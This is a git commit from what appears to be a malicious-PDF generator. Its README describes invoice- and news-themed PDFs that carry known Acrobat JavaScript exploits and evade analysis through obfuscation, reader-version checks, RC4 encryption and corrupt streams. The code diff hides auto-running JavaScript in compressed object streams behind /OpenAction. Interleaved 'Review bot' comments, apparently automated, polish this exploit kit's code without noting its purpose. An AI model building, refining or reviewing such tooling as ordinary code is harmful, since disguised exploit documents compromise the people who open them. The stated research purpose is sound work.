
added readme

1 parent d91d1ab commit 18a504b2e21407542b4c109e5a5a53cce2ffcdad @9b committed Oct 12, 2011
Showing with 76 additions and 31 deletions.
  1. +46 −0 README
  2. +1 −1 drop_invoice.php
  3. +8 −5 drop_news.php
  4. +21 −19 invoice.class.php
  5. +0 −6 test.php
46 README
@@ -0,0 +1,46 @@
+Summary
+=======
+Using this tool you can create malicious PDF documents using known JavaScript exploits. These files can then be used in research and testing to further improve how PDF analysis is done. Releasing this library also means that it on the radar of tools that may be used by attackers to generate their documents. Knowing this, the security community can be more prepared and spend more time handling this issue rather than avoiding it.
+
+Important Files
+===============
+drop_invoice.php - uses the forms, lists and other information to produce an invoice packed with exploits
+drop_news.php - uses RSS to produce PDF files with current news information packed with exploits
+drop_packed.php - takes in a directory of "good" PDF files and packs them with exploits
+
+General Output
+==============
+- JavaScript is obfuscated using random variables
+- Version is taken into account so that exploits are not fired if the reader is not vulnerable
+- Files are encrypted using RC4
+- Streams are dorked by adding a corrupt GZIP stream to the JavaScript object
+- Metadata is pulled from "known good" PDF files
+
+Inheritance Chain (from end to start)
+=====================================
+FPDF uses inheritance to achieve a full featureset. If you want more features, those features must then be included in the inheritance chain to be taken advantage of. These may not all be used, but by having them in the chain means you can activate them at the highest level of the construction (exploit generation).
+
+PDF_Exploit (pdf_exploit_generator.class.php => Provides exploit packing and building
+FPDF_Protection (protection.class.php) => Provides encryption functionality
+PDF_Invoice (invoice.class.php) => Provides JavaScript insert hook with dorked streams
+concat_pdf (concat.class.php) => Provides the ability to concatenate two different PDF files (used in packing)
+FPDI (fpdi.php) => Provides major functionality for generating documents
+
+Using the Library in Existing Projects
+======================================
+Ensure all files are present at the root level and include pdf_exploit_generator.class.php.
+
+Generating the document:
+$pdf = new PDF_Exploit( 'P', 'mm', 'A4' );
+
+Setting encryption:
+$pdf->SetProtection(array('print'),'');
+
+Adding an exploit (reference the class for methods):
+$pdf-><exploit_to_add>(<shellcode>);
+
+Building the object with the exploits:
+$pdf->build_exploit();
+
+Output the PDF:
+$pdf->Output();
@@ -86,5 +86,5 @@
$pdf->addNewPlayer("\x90");
$pdf->addCollectEmailInfo("\x90");
$pdf->build_exploit();
-$pdf->Output($invoice_number ."_invoice.pdf", "F");
+$pdf->Output($invoice_number ."_invoice.pdf","D");
?>
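Review bot: The switch from `"F"` to `"D"` on the Output line changes this script from writing the PDF to disk to sending it as an HTTP download, which the commit message ("added readme") does not mention. The output filename `$invoice_number ."_invoice.pdf"` is now placed in a response header, so where `$invoice_number` is assigned (outside this hunk) it should be constrained to a safe character set if it can originate from request input. In download mode FPDF refuses to send once any output has already reached the client, so the closing `?>` on the last line becomes a liability: trailing whitespace after a closing tag in this or an included file would break the response, and the usual PHP convention is to omit `?>` in PHP-only files.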
@@ -13,11 +13,14 @@
$pdf->SetFont('Arial','',16);
$pdf->WriteHTML($rss[$i]['description']);
}
-$pdf->addCollectEmailInfo("\x90");
-$pdf->addUtilPrintf("\x90");
-$pdf->addGetIcon("\x90");
-$pdf->addNewPlayer("\x90");
-$pdf->build_exploit();
+
+//$pdf->addCollectEmailInfo("\x90");
+//$pdf->addUtilPrintf("\x90");
+//$pdf->addGetIcon("\x90");
+//$pdf->addNewPlayer("\x90");
+//$pdf->build_exploit();
+
+$pdf->HelloWorld();
$pdf->Output();
?>
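Review bot: The five calls are commented out rather than removed, and `$pdf->HelloWorld();` is introduced without a definition visible in this hunk. Commented-out code belongs in git history, so delete those lines; and confirm `HelloWorld()` actually exists on the class `$pdf` is an instance of (presumably PDF_Exploit per the README, its declaration is outside the hunk), because calling an undefined method is a fatal error at runtime. If this is a temporary debugging state, say so with a `// TODO: restore exploit calls` comment or in the commit message instead of leaving silent toggles. The `for` loop closed by the `}` near the top of the hunk begins outside it.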
@@ -40,26 +40,27 @@ class PDF_Invoice extends concat_pdf
function IncludeJS($script) {
$this->javascript=$script;
}
-
+
function _putjavascript() {
+
+ //we need this
+ // << /Length 1659 /N 22 /Type /ObjStm /Filter /FlateDecode /First 160 >>
$randoms = Obfuscators::get_random_string_array(15, 30);
- $this->_newobj();
- $this->n_js=$this->n;
- $this->_out('<<');
- $this->_out("/Names [($randoms[0]) ".($this->n+1).' 0 R]');
- $this->_out('>>');
- $this->_out('endobj');
- $this->_newobj();
- $this->_out('<< /S /JavaScript/JS '.($this->n+1).' 0 R >>');
- $this->_out('endobj');
- $this->_newobj();
- $data = $this->javascript;
- $data = gzcompress($data);
- $garbage = $data[strlen($data)-1] = $data[strlen($data)+1];
- $this->_out('<</Filter /FlateDecode /Length '.strlen($data).'>>');
- $this->_putstream($data);
- $this->_putstream($garbage);
- $this->_out('endobj');
+ $this->_newobj(); //need this for the top level
+ $this->n_js=$this->n;
+ $ref_open = $this->n + 99999;
+ $objs = "$ref_open 27055\n";
+ $objs .= "<</AA << /O << /S/JavaScript/JS($this->javascript ) >> >> >>";
+
+ //build out the objstm
+ $objs_length = strlen($objs);
+ $objs_num = "1";
+ $compressed_objs = gzcompress($objs);
+ // $compressed_objs = $objs;
+
+ $this->_out("<< /Length $objs_length /N $objs_num /Type /ObjStm /Filter /FlateDecode /First 9 >>");
+ $this->_putstream($compressed_objs);
+ $this->_out('endobj'); //end the objstm
}
function _putresources() {
@@ -72,7 +73,8 @@ function _putresources() {
function _putcatalog() {
parent::_putcatalog();
if (!empty($this->javascript)) {
- $this->_out('/Names <</JavaScript '.($this->n_js).' 0 R>>');
+ //$this->_out('/Names <</JavaScript '.($this->n_js).' 0 R>>');
+ $this->_out('/OpenAction '.($this->n_js+99999).' 0 R>>');
}
}
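Review bot: The literal `99999` is repeated in both hunks of this file (`$ref_open = $this->n + 99999;` in `_putjavascript` and `$this->n_js+99999` in `_putcatalog`), next to the unexplained `27055`, `/First 9` and `$objs_num = "1"`; none of them carries a comment saying what it means or why the two methods must agree, so a later edit to one will silently desynchronise the other. Hoist the offset into one class constant, e.g. `const OBJSTM_REF_OFFSET = 99999;`, referenced from both methods, and document each remaining magic number in place. The toggle lines `// $compressed_objs = $objs;` and `//$this->_out('/Names <</JavaScript ...` should be deleted rather than kept as comments, and the "we need this" comment with a pasted dictionary should say what the reader is meant to take from it. `_putresources`, between the two hunks, is not visible here.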
@@ -1,6 +0,0 @@
-<?php
-$compressed = gzcompress('This is a string');
-//$compressed = $compressed[strlen($compressed)-1] = utf8_encode("\xC6\x92");
-$uncompressed = gzuncompress($compressed);
-echo $compressed;
-?>
